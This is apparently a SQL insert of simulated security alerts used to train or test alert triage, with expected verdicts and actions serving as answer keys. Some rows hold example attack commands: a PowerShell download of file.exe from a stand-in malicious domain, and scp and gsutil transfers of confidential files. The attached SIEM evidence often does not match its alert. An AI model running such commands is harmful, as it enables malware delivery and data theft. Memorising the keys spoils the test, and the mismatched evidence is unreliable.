(1267, 'Potential Insider Threat Detected with Unauthorized File Access', 'high', 'Forcepoint', 'An employee attempted to access and download files that are beyond their access level, suggesting potential insider threat activity.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T11:25:50Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.4.55\",\"dst_ip\":null,\"username\":\"michael.jones\",\"hostname\":\"CORP-DESK-07\",\"request_body\":null,\"command_line\":\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for unauthorized file access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command indicates potential unauthorized file transfer\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access attempt to restricted files by an employee indicates a potential insider threat.\"}', 'Intermediate', 'DLP', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1268, 'Suspicious PowerShell Execution Detected', 'medium', 'Microsoft Purview', 'A PowerShell script was executed on an internal machine that attempted to download a file from a suspicious domain.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T07:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.60\",\"dst_ip\":\"203.0.113.77\",\"username\":\"john.doe\",\"hostname\":\"CORP-PS-01\",\"request_body\":null,\"command_line\":\"powershell.exe -Command \\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\Temp\\\\file.exe\\\"\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious PowerShell command\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Command \\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\Temp\\\\file.exe\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download potentially malicious executeable\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command indicates an attempt to download potentially malicious files from a known malicious domain.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System 
event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1269, 'False Positive: Authorized Software Update Detected', 'low', 'Forcepoint', 'A network connection was established to download a software update from an approved vendor. Initially flagged as suspicious due to the large data transfer.', 'Data Exfil', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.6.33\",\"dst_ip\":\"203.0.113.80\",\"username\":\"service.account\",\"hostname\":\"CORP-SERVER-03\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP performing authorized update\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted software vendor\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network activity was verified as a legitimate software update from an approved vendor.\"}', 'Intermediate', 'DLP', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1270, 'Suspicious File Transfer Detected via Cloud Service', 'medium', 'Netskope', 'Detected unexpected file uploads to a cloud storage service from a user\'s machine. Further analysis needed to confirm intent.', 'Data Exfil', 'T1567', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T12:30:00Z\",\"event_type\":\"file_upload\",\"src_ip\":\"192.168.7.22\",\"dst_ip\":\"198.51.100.10\",\"username\":\"alice.jones\",\"hostname\":\"CORP-LT-08\",\"request_body\":null,\"command_line\":\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in file upload\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unknown cloud storage service used for file upload\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of cloud storage for file uploads by an internal user indicates potential data exfiltration.\"}', 'Intermediate', 'DLP', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1271, 'False Positive: Routine Database Synchronization Detected', 'low', 'Microsoft Purview', 'Routine database synchronization detected between internal servers, flagged due to high data volume but confirmed as scheduled activity.', 'Data Exfil', 'T1071', 0, 'Closed', 213, '{\"timestamp\":\"2026-02-24T02:00:00Z\",\"event_type\":\"data_transfer\",\"src_ip\":\"192.168.8.50\",\"dst_ip\":\"192.168.8.51\",\"username\":\"db_sync\",\"hostname\":\"DB-SERVER-02\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-26 21:24:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.8.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal database server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.8.51\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal database server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was confirmed as part of routine database synchronization between internal servers.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1272, 'False Positive: Network Configuration Change Detected', 'low', 'Symantec DLP', 'A network configuration change was detected on a router by an authorized user. Initially flagged due to unusual time of change.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T04:30:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.9.10\",\"dst_ip\":\"192.168.9.1\",\"username\":\"network.admin\",\"hostname\":\"ROUTER-01\",\"request_body\":null,\"command_line\":\"apply_changes.sh\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.9.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of authorized network admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"apply_changes.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network configuration script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The configuration change was performed by an authorized user during scheduled maintenance.\"}', 'Intermediate', 'DLP', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
